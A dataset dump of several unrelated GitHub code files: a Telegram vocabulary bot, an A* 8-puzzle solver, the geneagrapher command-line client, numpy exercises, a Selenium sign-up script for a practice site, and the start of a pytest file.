sql.RETRY and note[4] < LEARN:\n all_retry_words.add(note[2])\n all_retry_words = list(all_retry_words)\n repeat_word = random.choice(all_retry_words)\n return repeat_word\n\n\ndef send_repeat_word(tg_id):\n \"\"\"\n Отправляет пользователю слово для повторения.\n :param tg_id:\n :return: nothing\n \"\"\"\n word_id = generate_repeat_word(tg_id)\n word = sql.word_info(word_id)\n markup = types.InlineKeyboardMarkup()\n markup.add(types.InlineKeyboardButton(text='Главное меню 🪴', callback_data='menu'))\n bot.send_message(chat_id=tg_id, text=f'Введи английский перевод этого слова: {word[2]}', reply_markup=markup)\n sql.set_repeat_word_id(tg_id, word[0])\n\n@bot.message_handler(commands=['learn_new'])\ndef learn_new(message):\n tg_id = message.from_user.id\n send_new_word(tg_id)\n\n@bot.message_handler(commands=['repeat_word'])\ndef repeat_word(message):\n tg_id = message.from_user.id\n send_repeat_word(tg_id)\n\n@bot.message_handler(commands=['add_words'])\ndef add_words(message):\n tg_id = message.from_user.id\n bot.send_message(tg_id, 'Пришли файл cо словами, для удобства используй вот такой шаблон:')\n bot.send_document(tg_id, open('files/shablon.xlsx', 'rb'))\n\n\n\n@bot.message_handler(commands=['start'])\ndef welcome(message):\n user_id = message.from_user.id\n user_username = message.from_user.username\n sticker = open('img/welcome.webp', 'rb')\n bot.send_sticker(message.chat.id, sticker)\n\n markup = types.InlineKeyboardMarkup(row_width=1)\n item1 = types.InlineKeyboardButton(text='Профиль 🗂', callback_data='profile')\n item2 = types.InlineKeyboardButton(text='Учить новые слова 🔎', callback_data='learn_new')\n item3 = types.InlineKeyboardButton(text='Повторять слова 📚', callback_data='repeat_words')\n markup.add(item1, item2, item3)\n bot.send_message(message.chat.id,\n 'Привет, {0.first_name}! 🥰\\nЯ - {1.first_name}, бот для изучения английского языка. 🤖'.format(\n message.from_user, bot.get_me()), parse_mode='html', reply_markup=markup)\n if not sql.is_user_in_db(message.from_user.id):\n sql.new_user(user_id, user_username)\n\n\n@bot.callback_query_handler(func=lambda call: True)\ndef callback_inline(call):\n tg_id = call.from_user.id\n if sql.is_user_in_db(tg_id):\n username = call.message.chat.username\n if call.message:\n if call.data == 'profile':\n markup2 = types.InlineKeyboardMarkup()\n markup2.add(types.InlineKeyboardButton(text='Учить новые слова 🔎', callback_data='learn_new'))\n markup2.add(types.InlineKeyboardButton(text='Повторять слова 📚', callback_data='repeat_words'))\n markup2.add(types.InlineKeyboardButton(text='Главное меню 🪴', callback_data='menu'))\n score = sql.user_info(tg_id)['score']\n bot.send_message(tg_id,\n f'Твой ник 😊: {username}\\n\\nТвои очки 😋: {score}\\n\\nВыученных слов 🤌: '\n f'{sql.user_info(tg_id)[\"cnt_words_total\"]}',\n reply_markup=markup2)\n elif call.data == 'learn_new':\n send_new_word(tg_id)\n elif call.data == 'repeat_words':\n send_repeat_word(tg_id)\n elif call.data == 'wrong':\n bot.send_message(tg_id,\n 'Не верно, но не расстраивайся, в следующий раз все получится! 😚')\n send_new_word(tg_id)\n elif call.data == 'accept':\n bot.send_message(tg_id,\n random.choice(ACCEPT_MESSAGES))\n # sql.add_new_note(tg_id, sql.user_info(tg_id)['new_word_id'], sql.RETRY, 0)\n sql.update_note(tg_id, sql.user_info(tg_id)['new_word_id'], type=sql.RETRY, again=0)\n send_new_word(tg_id)\n sql.inc_cnt_today(tg_id)\n elif call.data == 'menu':\n markup = types.InlineKeyboardMarkup(row_width=1)\n item1 = types.InlineKeyboardButton(text='Профиль 🗂', callback_data='profile')\n item2 = types.InlineKeyboardButton(text='Учить новые слова 🔎', callback_data='learn_new')\n item3 = types.InlineKeyboardButton(text='Повторять слова 📚', callback_data='repeat_words')\n markup.add(item1, item2, item3)\n bot.send_message(tg_id, 'Главное меню🪴', reply_markup=markup)\n\n\n\n@bot.message_handler(content_types=['text'])\ndef lalala(message):\n tg_id = message.from_user.id\n if sql.is_user_in_db(tg_id):\n user = sql.user_info(tg_id)\n repeat_word_id = user['repeat_word_id']\n eng = sql.word_info(repeat_word_id)\n if message.text == eng[1]:\n bot.send_message(chat_id=tg_id, text=random.choice(ACCEPT_MESSAGES))\n sql.inc_again_retry_word(tg_id, repeat_word_id)\n sql.set_repeat_word_id(tg_id, 0)\n send_repeat_word(tg_id)\n else:\n bot.send_message(chat_id=tg_id, text=random.choice(TRY_AGAIN))\n else:\n bot.send_message(message.chat.id, 'Напиши \"/start\", чтобы начать пользоваться ботом! ✨')\n # TODO (@Олеся) нужно сказать напиши /start\n\n\nbot.polling(none_stop=True)\n# тууган туган як\n","repo_name":"lippertmark/Learn_En_words","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9704,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73542920808","text":"from typing import final\nimport numpy as np\nfrom numpy.core.fromnumeric import argmin\n\nDEPTH_MAX=50 # Root node has 0 depth\nnp.random.seed(1)\n#--------------------#\n# Equality of arrays #\n#--------------------#\ndef is_equal(A,B):\n if A.shape[0]!=B.shape[0] or A.shape[1]!=B.shape[1]:\n return False\n for i in range(A.shape[0]):\n for j in range(B.shape[1]):\n if A[i][j]!=B[i][j]:\n return False\n return True\n#--------------------#\n# Printing dashboard #\n#--------------------#\ndef print_dashboard(A):\n print(\"%d : %d : %d\" %(A[0][0],A[0][1],A[0][2]))\n print(\"%d : %d : %d\" %(A[1][0],A[1][1],A[1][2]))\n print(\"%d : %d : %d\" %(A[2][0],A[2][1],A[2][2]))\n#------------#\n# Node class #\n#------------#\nclass node:\n def __init__(self,value,cost,father_node=None):\n self.value = value\n self.cost=cost\n self.father_node = father_node\n # Depth\n depth_node=0\n father=father_node\n while father!=None:\n father=father.father_node\n depth_node=depth_node+1\n self.depth=depth_node\n # Equality in nodes\n def __eq__(self, other):\n if isinstance(other, node):\n aux1=self.value\n aux2=other.value\n return is_equal(aux1,aux2)\n return False\n#-------------#\n# Node Deepth #\n#-------------#\ndef depth(current_state):\n depth_node=0\n father=current_state.father_node\n while father!=None:\n father=father.father_node\n depth_node=depth_node+1\n return depth_node\n'''\nDistances\n''' \n#--------------------# \n# Manhattan distance #\n#--------------------#\ndef Manhattan_dist(current_value,final_value):\n dist=0\n for i in range(3):\n for value in final_value[i]:\n if value!=0.0:\n dist+=abs(np.where(current_value==value)[0]-np.where(final_value==value)[0])[0]\n dist+=abs(np.where(current_value==value)[1]-np.where(final_value==value)[1])[0]\n return dist\n#--------------------#\n# Counting distance #\n#--------------------# \ndef Counting_dist(current_value,final_value):\n misplaced=(current_value==final_value)\n dist=misplaced.size-np.sum(misplaced)\n if np.where(current_value==0)!=np.where(final_value==0):\n return dist-1\n return dist\n#----------------------#\n# Permutation distance #\n#----------------------#\ndef Inversion_dist(current_value,final_value):\n # Inversions based in the order configuration 123456780\n inv_count_current = 0\n arr_current=[j for sub in current_value for j in sub]\n empty_value = 0\n for i in range(0, 9):\n for j in range(i + 1, 9):\n if arr_current[i] != empty_value and arr_current[j] != empty_value and arr_current[i] > arr_current[j]:\n inv_count_current += 1\n # Number of inversions for the final value\n inv_count_final = 0\n arr_final=[j for sub in final_value for j in sub]\n for i in range(0, 9):\n for j in range(i + 1, 9):\n if arr_final[i] != empty_value and arr_final[j] != empty_value and arr_final[i] > arr_final[j]:\n inv_count_final += 1\n return abs(inv_count_current-inv_count_final) # In the goal is zero \n'''\nInformed Search\n'''\n#--------------#\n# A* Algorithm #\n#--------------#\nclass A_star:\n # Initial variables \n def __init__(self,init_value,final_value,dist_func):\n self.init_state=node(value=init_value,cost=dist_func(init_value,final_value))\n self.final_value=final_value\n self.open_states=[]\n self.closed_states=[]\n # Count inversions\n def getInvCount(self,arr):\n inv_count = 0\n empty_value = 0\n for i in range(0, 9):\n for j in range(i + 1, 9):\n if arr[i] != empty_value and arr[j] != empty_value and arr[i] > arr[j]:\n inv_count += 1\n return inv_count\n # if given 8 puzzle is solvable.\n def isSolvable(self,puzzle):\n # Count inversions in given 8 puzzle\n inv_count = self.getInvCount([j for sub in puzzle.value for j in sub])\n inv_count_final=self.getInvCount([j for sub in self.final_value for j in sub])\n # return true if inversion count is even.\n return (inv_count % 2 == inv_count_final % 2)\n # Obtain successors\n def get_successors(self,current_state,dist_func):\n # Current state value\n father_node=current_state\n current_state=current_state.value\n # Hole Position\n position_hole=np.where(current_state==0)\n position_hole=list(zip(position_hole[0],position_hole[1]))\n hole=position_hole[0]\n # Available Positions and movements\n available_pos=[0,1,2]\n movements=[hole[0]-1,hole[0]+1,hole[1]-1,hole[1]+1]\n # Build sons\n sons=[]\n # (i,j)->(i-1,j) (up) \n if available_pos.count(movements[0])>0:\n tmp1=current_state[hole[0]][hole[1]]\n tmp2=current_state[movements[0]][hole[1]]\n son_value=np.copy(current_state)\n son_value[hole[0]][hole[1]]=tmp2\n son_value[movements[0]][hole[1]]=tmp1\n son=node(son_value,dist_func(son_value,self.final_value),father_node)\n sons.append(son)\n # (i,j)->(i+1,j) (down) \n if available_pos.count(movements[1])>0:\n tmp1=current_state[hole[0]][hole[1]]\n tmp2=current_state[movements[1]][hole[1]]\n son_value=np.copy(current_state)\n son_value[hole[0]][hole[1]]=tmp2\n son_value[movements[1]][hole[1]]=tmp1\n son=node(son_value,dist_func(son_value,self.final_value),father_node)\n sons.append(son)\n # (i,j)->(i,j-1) (leff)\n if available_pos.count(movements[2])>0:\n tmp1=current_state[hole[0]][hole[1]]\n tmp2=current_state[hole[0]][movements[2]]\n son_value=np.copy(current_state)\n son_value[hole[0]][hole[1]]=tmp2\n son_value[hole[0]][movements[2]]=tmp1\n son=node(son_value,dist_func(son_value,self.final_value),father_node)\n sons.append(son)\n # (i,j)->(i,j+1) (right)\n if available_pos.count(movements[3])>0:\n tmp1=current_state[hole[0]][hole[1]]\n tmp2=current_state[hole[0]][movements[3]]\n son_value=np.copy(current_state)\n son_value[hole[0]][hole[1]]=tmp2\n son_value[hole[0]][movements[3]]=tmp1\n son=node(son_value,dist_func(son_value,self.final_value),father_node)\n sons.append(son)\n return sons\n # Deal with repetitions\n def deal_repetitions(self,sons):\n # Open states\n for open_node in self.open_states:\n for state in sons:\n if is_equal(open_node.value,state.value):\n if open_node.cost+open_node.depth>state.cost+state.depth:\n self.open_states.remove(open_node)\n else:\n sons.remove(state)\n #sons.remove(state)\n # Closed states\n for closed_node in self.closed_states:\n for state in sons:\n if is_equal(closed_node.value,state.value):\n \n if closed_node.cost+closed_node.depth>state.cost+state.depth:\n self.closed_states.remove(state)\n #sons.remove(state)\n else:\n sons.remove(state)\n #sons.remove(state)\n return sons\n # Append in list open\n def append_open(self,sons):\n for son in sons:\n self.open_states.append(son)\n # Getting better (from open_states)\n def get_better(self):\n cost=np.array([state.cost+state.depth for state in self.open_states])\n argmin_cost=np.argwhere(cost==np.amin(cost))\n argmin_cost=argmin_cost.reshape(argmin_cost.shape[0])\n if argmin_cost.size==1:\n value=self.open_states[argmin_cost[0]]\n #self.open_states.remove(value)\n return value\n else:\n # First criteria for repetitions is the heuristic distance\n states_argmin_cost=[self.open_states[i] for i in argmin_cost]\n heuristic_value=[state.cost for state in states_argmin_cost]\n argmin_heuristic=np.argwhere(heuristic_value==np.amin(heuristic_value))\n argmin_heuristic=argmin_heuristic.reshape(argmin_heuristic.shape[0])\n if argmin_heuristic.size==1:\n value=states_argmin_cost[argmin_heuristic[0]]\n #self.open_states.remove(value)\n return value\n else:\n # Second criteria for repetitions is the depth\n states_argmin_heuristic=[states_argmin_cost[i] for i in argmin_heuristic]\n depth_value=[state.depth for state in states_argmin_heuristic]\n argmin_depth=np.argwhere(depth_value==np.amin(depth_value))\n argmin_depth=argmin_depth.reshape(argmin_depth.shape[0])\n value=states_argmin_heuristic[argmin_depth[0]]\n #self.open_states.remove(value)\n return value\n # Main function\n def main(self,dist_func):\n if self.isSolvable(self.init_state):\n # Search Algorithm\n current_state=self.init_state\n self.open_states.append(current_state)\n while (not is_equal(current_state.value,self.final_value)) and len(self.open_states)>0:\n self.open_states.remove(current_state)\n self.closed_states.append(current_state)\n if current_state.depth<=DEPTH_MAX:\n sons=self.get_successors(current_state,dist_func)\n sons=self.deal_repetitions(sons)\n if len(sons)>0:\n self.append_open(sons)\n current_state=self.get_better()\n self.final_state=current_state\n self.closed_states.append(self.final_state)\n # Printing solution\n aux=[current_state.value]\n father=current_state.father_node\n while father!=None:\n aux.append(father.value)\n father=father.father_node\n aux.reverse()\n for i in range(len(aux)):\n print_dashboard(aux[i])\n print('\\n')\n print('Numero de movimientos de la solución: %d' %(len(aux)-1))\n print('Numero de nodos visitados: %d' %(len(self.closed_states)))\n print('Numero de nodos por visitar: %d' %(len(list(self.open_states))))\n print('Numero de nodos expandidos: %d' %(len(self.closed_states)+len(list(self.open_states))))\n else:\n print('No se puede alcanzar el nodo final')\n\n#-------#\n# Proof #\n#-------#\n'''\ninit_value=np.array([[3,2,1],[6,5,4],[8,7,0]])\nfinal_value=np.array([[1,2,3],[4,5,6],[8,7,0]])\n\nA_star_1=A_star(init_value,final_value,Inversion_dist)\nA_star_1.main(Inversion_dist)\n'''\n\n","repo_name":"robervz22/IA-y-TC","sub_path":"Tarea-3-IA/heuristic_search.py","file_name":"heuristic_search.py","file_ext":"py","file_size_in_byte":11047,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36910405923","text":"from .output.dot import DotOutput\nfrom .output.identity import IdentityOutput\nfrom .types import Geneagraph\n\nfrom argparse import ArgumentParser, FileType\nimport asyncio\nfrom importlib.metadata import PackageNotFoundError, version\nimport json\nimport platform\nimport textwrap\nfrom typing import (\n Any,\n Dict,\n List,\n Literal,\n Protocol,\n Type,\n TypedDict,\n Union,\n cast,\n)\nimport re\nimport sys\nimport websockets\nimport websockets.client\n\n\nGGRAPHER_URI = \"wss://ggrphr.davidalber.net\"\nTEXTWRAP_WIDTH = 79\n\n\nclass OutputFormatter(Protocol):\n \"\"\"This defines an interface that output classes must implement.\"\"\"\n\n def __init__(self, graph: Geneagraph) -> None:\n ...\n\n @property\n def output(self) -> str:\n \"\"\"Return the graph's formatted output.\"\"\"\n ...\n\n\nclass StartNodeRequest(TypedDict):\n recordId: int\n getAdvisors: bool\n getDescendants: bool\n\n\nclass RequestPayload(TypedDict):\n kind: Literal[\"build-graph\"]\n options: Dict[Literal[\"reportingCallback\"], bool]\n startNodes: List[StartNodeRequest]\n\n\nclass ProgressCallback(TypedDict):\n queued: int\n fetching: int\n done: int\n\n\nclass GgrapherError(Exception):\n def __init__(self, msg: str, *, extra: Dict[str, str] = {}) -> None:\n self.msg = msg\n self.extra = extra\n\n def __str__(self) -> str:\n ret_arr = [\n textwrap.fill(self.msg, width=TEXTWRAP_WIDTH),\n \"\",\n textwrap.fill(\n \"If this problem persists, please create an issue at \\\nhttps://github.com/davidalber/geneagrapher/issues/new, and include the following in \\\nthe issue body:\",\n width=TEXTWRAP_WIDTH,\n ),\n ]\n\n # For the key-value arguments, determine the length of the\n # longest key and use that information to align the columns.\n extras_width = (\n max([len(k) for k in [\"Message\", \"Command\"] + list(self.extra.keys())]) + 2\n ) # The 2 is for \": \"\n\n ret_arr.append(f\"\\n {'Message:':{extras_width}}{self.msg}\")\n ret_arr.append(f\" {'Command:':{extras_width}}{' '.join(sys.argv)}\")\n\n for k, v in self.extra.items():\n key = f\"{k}:\"\n ret_arr.append(f\" {key:{extras_width}}{v}\")\n\n return \"\\n\".join(ret_arr)\n\n\nclass StartNodeArg:\n def __init__(self, val: str) -> None:\n # Validate the input.\n match = re.fullmatch(r\"(\\d+)(:(a|d|ad|da))\", val)\n if match is None:\n raise ValueError()\n self.record_id = int(match.group(1))\n\n self.request_advisors = \"a\" in (match.group(2) or [])\n self.request_descendants = \"d\" in (match.group(2) or [])\n\n # If no traverse direction was specified, default to advisors.\n if not self.request_advisors and not self.request_descendants:\n self.request_advisors = True\n\n @property\n def start_node(self) -> StartNodeRequest:\n return {\n \"recordId\": self.record_id,\n \"getAdvisors\": self.request_advisors,\n \"getDescendants\": self.request_descendants,\n }\n\n\ndef make_payload(start_nodes: List[StartNodeArg], quiet: bool) -> RequestPayload:\n return {\n \"kind\": \"build-graph\",\n \"options\": {\"reportingCallback\": not quiet},\n \"startNodes\": [sn.start_node for sn in start_nodes],\n }\n\n\ndef display_progress(queued: int, doing: int, done: int) -> None:\n prefix = \"Progress: \"\n size = 60\n count = queued + doing + done\n\n x = int(size * done / count)\n y = int(size * doing / count)\n\n print(\n f\"{prefix}[{u'█'*x}{u':'*y}{('.'*(size - x - y))}] {done}/{count}\",\n end=\"\\r\",\n file=sys.stderr,\n flush=True,\n )\n\n\nasync def get_graph(payload: RequestPayload) -> Geneagraph:\n def intify_record_keys(d: Dict[Any, Any]) -> Dict[Any, Any]:\n \"\"\"JSON object keys are strings, but the Geneagraph type\n expects the keys of the nodes object to be integers. This\n function converts those keys to ints during deserialization.\n \"\"\"\n if \"nodes\" in d:\n ret = {k: v for k, v in d.items() if k != \"nodes\"}\n ret[\"nodes\"] = {int(k): v for k, v in d[\"nodes\"].items()}\n return ret\n\n return d\n\n try:\n async with websockets.client.connect(\n GGRAPHER_URI,\n user_agent_header=f\"Python/{platform.python_version()} \\\nGeneagrapher/{get_version()}\",\n ) as ws:\n await ws.send(json.dumps(payload))\n while True:\n response_json = await ws.recv()\n response = json.loads(response_json, object_hook=intify_record_keys)\n response_payload: Union[\n Geneagraph, ProgressCallback, None\n ] = response.get(\"payload\")\n\n if response[\"kind\"] == \"graph\":\n return cast(Geneagraph, response_payload)\n elif response[\"kind\"] == \"progress\":\n progress = cast(ProgressCallback, response_payload)\n display_progress(\n progress[\"queued\"], progress[\"fetching\"], progress[\"done\"]\n )\n else:\n raise GgrapherError(\n \"Request to Geneagrapher backend failed.\",\n extra={\"Response\": str(response_json)},\n )\n except websockets.exceptions.WebSocketException:\n raise GgrapherError(\"Geneagrapher backend is currently unavailable.\")\n\n\ndef get_formatter(format: Literal[\"dot\", \"json\"], graph: Geneagraph) -> OutputFormatter:\n format_map: Dict[str, Type[OutputFormatter]] = {\n \"dot\": DotOutput,\n \"json\": IdentityOutput,\n }\n return format_map[format](graph)\n\n\ndef get_version() -> str:\n try:\n return version(\"geneagrapher\")\n except PackageNotFoundError:\n return \"dev\"\n\n\ndef run() -> None:\n description = 'Create a Graphviz \"dot\" file for a mathematics \\\ngenealogy, where ID is a record identifier from the Mathematics Genealogy \\\nProject.'\n parser = ArgumentParser(description=description)\n\n parser.add_argument(\n \"-f\",\n \"--format\",\n choices=(\"dot\", \"json\"),\n default=\"dot\",\n help=\"graph output format (default: dot)\",\n )\n parser.add_argument(\n \"-o\",\n \"--out\",\n dest=\"outfile\",\n help=\"write output to FILE [default: stdout]\",\n type=FileType(\"w\"),\n metavar=\"FILE\",\n default=sys.stdout,\n )\n parser.add_argument(\n \"-q\",\n \"--quiet\",\n action=\"store_true\",\n default=False,\n help=\"do not display the progress bar\",\n )\n parser.add_argument(\n \"--version\", action=\"version\", version=f\"%(prog)s {get_version()}\"\n )\n parser.add_argument(\n \"ids\",\n metavar=\"ID\",\n type=StartNodeArg,\n nargs=\"+\",\n help=\"mathematician record ID; valid formats are 'ID:a' for advisor \\\ntraversal, 'ID:d' for descendant traversal, or 'ID:ad' for advisor and descendant \\\ntraversal\",\n )\n\n args = parser.parse_args()\n payload = make_payload(args.ids, args.quiet)\n\n async def build_graph() -> None:\n graph = await get_graph(payload)\n\n if not args.quiet:\n # Output a line break to end the progress bar.\n print(file=sys.stderr)\n\n formatter: OutputFormatter = get_formatter(args.format, graph)\n print(formatter.output, file=args.outfile)\n\n try:\n asyncio.run(build_graph())\n except GgrapherError as e:\n print(e, file=sys.stderr)\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"davidalber/geneagrapher","sub_path":"geneagrapher/geneagrapher.py","file_name":"geneagrapher.py","file_ext":"py","file_size_in_byte":7631,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"53"} +{"seq_id":"19280993226","text":"# GRADED FUNCTION: sigmoid\n\nimport math\n\nimport numpy as np\n\n# example of np.exp\nx = np.array([1, 2, 3])\nprint(np.exp(x)) # result is (exp(1), exp(2), exp(3))\n\n# example of vector operation\nx = np.array([1, 2, 3])\nprint (x + 3)\n\ndef sigmoid(x):\n\n s = 1/(1+np.exp(-x))\n \n return s\n\nx = np.array([1, 2, 3])\nsigmoid(x)\n\n# GRADED FUNCTION: sigmoid_derivative\n\ndef sigmoid_derivative(x):\n\n s = 1/(1+np.exp(-x))\n ds = s*(1-s)\n \n return ds\n\nx = np.array([1, 2, 3])\nprint (\"sigmoid_derivative(x) = \" + str(sigmoid_derivative(x)))\n\n# GRADED FUNCTION: image2vector\ndef image2vector(image):\n\n v = image.reshape((image.shape[0]*image.shape[1]*image.shape[2],1))\n \n return v\n\n#import numpy as np\nimage = np.array([[[ 0.67826139, 0.29380381],\n [ 0.90714982, 0.52835647],\n [ 0.4215251 , 0.45017551]],\n\n [[ 0.92814219, 0.96677647],\n [ 0.85304703, 0.52351845],\n [ 0.19981397, 0.27417313]],\n\n [[ 0.60659855, 0.00533165],\n [ 0.10820313, 0.49978937],\n [ 0.34144279, 0.94630077]]])\n\nprint (\"image2vector(image) = \" + str(image2vector(image)))\n\n# GRADED FUNCTION: normalizeRows\ndef normalizeRows(x):\n\n # Compute x_norm as the norm 2 of x.\n x_norm = np.linalg.norm(x,axis=1,keepdims = True)\n print(x_norm.shape)\n # Divide x by its norm.\n x = x/x_norm\n\n return x\n\nx = np.array([\n [0, 3, 4],\n [1, 6, 4]])\nprint(\"normalizeRows(x) = \" + str(normalizeRows(x)))\n\n# GRADED FUNCTION: softmax\n\ndef softmax(x):\n\n # Apply exp() element-wise to x. Use np.exp(...).\n x_exp = np.exp(x)\n\n x_sum = np.sum(x_exp,axis=1,keepdims = True)\n \n # Compute softmax(x) by dividing x_exp by x_sum.\n s = x_exp/x_sum\n \n return s\n\nx = np.array([[9, 2, 5, 0, 0],[7, 5, 0, 0 ,0]])\nprint(\"softmax(x) = \" + str(softmax(x)))\n\nimport time\n\nx1 = [9, 2, 5, 0, 0, 7, 5, 0, 0, 0, 9, 2, 5, 0, 0]\nx2 = [9, 2, 2, 9, 0, 9, 2, 5, 0, 0, 9, 2, 5, 0, 0]\n\n### CLASSIC DOT PRODUCT OF VECTORS IMPLEMENTATION ###\ntic = time.process_time()\ndot = 0\nfor i in range(len(x1)):\n dot+= x1[i]*x2[i]\ntoc = time.process_time()\nprint (\"dot = \" + str(dot) + \"\\n ----- Computation time = \" + str(1000*(toc - tic)) + \"ms\")\n\n### CLASSIC OUTER PRODUCT IMPLEMENTATION ###\ntic = time.process_time()\nouter = np.zeros((len(x1),len(x2))) # we create a len(x1)*len(x2) matrix with only zeros\nfor i in range(len(x1)):\n for j in range(len(x2)):\n outer[i,j] = x1[i]*x2[j]\ntoc = time.process_time()\nprint (\"outer = \" + str(outer) + \"\\n ----- Computation time = \" + str(1000*(toc - tic)) + \"ms\")\n\n### CLASSIC ELEMENTWISE IMPLEMENTATION ###\ntic = time.process_time()\nmul = np.zeros(len(x1))\nfor i in range(len(x1)):\n mul[i] = x1[i]*x2[i]\ntoc = time.process_time()\nprint (\"elementwise multiplication = \" + str(mul) + \"\\n ----- Computation time = \" + str(1000*(toc - tic)) + \"ms\")\n\n### CLASSIC GENERAL DOT PRODUCT IMPLEMENTATION ###\nW = np.random.rand(3,len(x1)) # Random 3*len(x1) numpy array\ntic = time.process_time()\ngdot = np.zeros(W.shape[0])\nfor i in range(W.shape[0]):\n for j in range(len(x1)):\n gdot[i] += W[i,j]*x1[j]\ntoc = time.process_time()\nprint (\"gdot = \" + str(gdot) + \"\\n ----- Computation time = \" + str(1000*(toc - tic)) + \"ms\")\n\nx1 = [9, 2, 5, 0, 0, 7, 5, 0, 0, 0, 9, 2, 5, 0, 0]\nx2 = [9, 2, 2, 9, 0, 9, 2, 5, 0, 0, 9, 2, 5, 0, 0]\n\n### VECTORIZED DOT PRODUCT OF VECTORS ###\ntic = time.process_time()\ndot = np.dot(x1,x2)\ntoc = time.process_time()\nprint (\"dot = \" + str(dot) + \"\\n ----- Computation time = \" + str(1000*(toc - tic)) + \"ms\")\n\n### VECTORIZED OUTER PRODUCT ###\ntic = time.process_time()\nouter = np.outer(x1,x2)\ntoc = time.process_time()\nprint (\"outer = \" + str(outer) + \"\\n ----- Computation time = \" + str(1000*(toc - tic)) + \"ms\")\n\n### VECTORIZED ELEMENTWISE MULTIPLICATION ###\ntic = time.process_time()\nmul = np.multiply(x1,x2)\ntoc = time.process_time()\nprint (\"elementwise multiplication = \" + str(mul) + \"\\n ----- Computation time = \" + str(1000*(toc - tic)) + \"ms\")\n\n### VECTORIZED GENERAL DOT PRODUCT ###\ntic = time.process_time()\ndot = np.dot(W,x1)\ntoc = time.process_time()\nprint (\"gdot = \" + str(dot) + \"\\n ----- Computation time = \" + str(1000*(toc - tic)) + \"ms\")\n\n# GRADED FUNCTION: L1\n\ndef L1(yhat, y):\n \"\"\"\n loss -- the value of the L1 loss function defined above\n \"\"\"\n\n loss = np.sum(np.abs(y - yhat))\n \n return loss\n\nyhat = np.array([.9, 0.2, 0.1, .4, .9])\ny = np.array([1, 0, 0, 1, 1])\nprint(\"L1 = \" + str(L1(yhat,y)))\n\n# GRADED FUNCTION: L2\n\ndef L2(yhat, y):\n \"\"\"\n loss -- the value of the L2 loss function defined above\n \"\"\"\n loss = np.dot((y - yhat).T,(y - yhat))\n \n return loss\n\nyhat = np.array([.9, 0.2, 0.1, .4, .9])\ny = np.array([1, 0, 0, 1, 1])\nprint(\"L2 = \" + str(L2(yhat,y)))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Leoricking/Neural-Network","sub_path":"1.Python Basics With Numpy/Python Basics With Numpy.py","file_name":"Python Basics With Numpy.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21533139240","text":"# https://www.acmicpc.net/problem/1292\n\na,b = map(int,input().split())\n \narr = [0]\nfor i in range(46):\n for j in range(i):\n arr.append(i)\n \nprint(sum(arr[a:b+1]))\n","repo_name":"1c0332zz/TIL","sub_path":"Judge/Baekjoon/20220728/1292_쉽게 푸는 문제.py","file_name":"1292_쉽게 푸는 문제.py","file_ext":"py","file_size_in_byte":173,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"26911223998","text":"from week7.steps.webdriver_functions import *\nfrom selenium.webdriver.support.select import Select\n\n\nsign_in_link = \"//a[@class='login']\"\nemail_input = \"//input[@id='email_create']\"\ncreate_an_account_button = \"//form[@id='create-account_form']//span[1]\"\npassword_input = \"//input[@id='passwd']\"\ntitle_input = \"//input[@id='id_gender2']\"\nfirst_name_button =\"//input[@id='customer_firstname']\"\nlast_name_button =\"//input[@id='customer_lastname']\"\ndate_of_birth_day = \"//select[@id='days']\"\ndate_of_birth_month = \"//select[@id='months']\"\ndate_of_birth_year = \"//select[@id='years']\"\naddress_input = \"//input[@id='address1']\"\ncity_input = \"//input[@id='city']\"\nzip_code_input = \"//input[@id='postcode']\"\nphone_input = \"//input[@id='phone_mobile']\"\nregister_input = \"//span[contains(text(),'Register')]\"\nsign_out_link = \"//a[@class='logout']\"\n\n#Scenario 1\n# 1. Open automationpractice.com website\n# 2. Enter email to create a new account\n# 3. Click on \"Create an account\"\n\nlaunch_website(\"http://automationpractice.com/index.php\")\n\nclick_element_by_xpath(sign_in_link)\nenter_text_by_xpath(email_input, \"1724@email.com\")\nclick_element_by_xpath(create_an_account_button)\ntime.sleep(5)\n\n# Scenario 2\n# 1. Find all elements (xpathe, id, name)\n# 2. Input/select all required fields (your personal information)\n# 3. Click \"register\" button.\n\nclick_element_by_xpath(title_input)\ntime.sleep(2)\nenter_text_by_xpath(first_name_button, \"Nadia\")\ntime.sleep(2)\nenter_text_by_xpath(last_name_button, \"Z\")\ntime.sleep(2)\nenter_text_by_xpath(password_input, \"Nadia3!\")\ntime.sleep(2)\n\ndd_days = Select(driver.find_element_by_id(\"days\"))\ndd_days.select_by_value('3')\ntime.sleep(2)\n\ndd_months = Select(driver.find_element_by_id(\"months\"))\ndd_months.select_by_value('10')\ntime.sleep(2)\n\ndd_years = Select(driver.find_element_by_id(\"years\"))\ndd_years.select_by_value('1983')\ntime.sleep(2)\n\nenter_text_by_xpath(address_input, \"189 Bay 23 St\")\nenter_text_by_xpath(city_input, \"Brooklyn\")\ntime.sleep(2)\n\nselect = Select(driver.find_element_by_id(\"id_state\"))\nselect.select_by_visible_text('New York')\n\nenter_text_by_xpath(zip_code_input, \"11214\")\ntime.sleep(2)\n\nenter_text_by_xpath(phone_input, \"1234567890\")\nclick_element_by_xpath(register_input)\ntime.sleep(5)\n\n# Scenario 3\n# 1. Verify that account is created by message\n# 2. Log out\n# 3. Close the browser\n\nheading_xpath = \"//span[contains(text(),'Nadia Z')]\"\nelement = driver.find_element_by_xpath(heading_xpath)\nassert \"Nadia Z\" in element.text\nprint(\"Your account is successfully created.\")\n\nclick_element_by_xpath(sign_out_link)\nprint(\"Logging out now...\")\n\nclose_browser()\n\n\n","repo_name":"NadiyaZelman/gitproject1","sub_path":"myweek6/class_project1.py","file_name":"class_project1.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71604514728","text":"import pytest\nfrom polytropos.ontology.variable import Text\nfrom polytropos.ontology.variable.__primitive import EIN\n\n@pytest.mark.parametrize(\"original, expected\", [\n (None, None),\n (\"\", \"\"),\n (\"/El Niño/\", 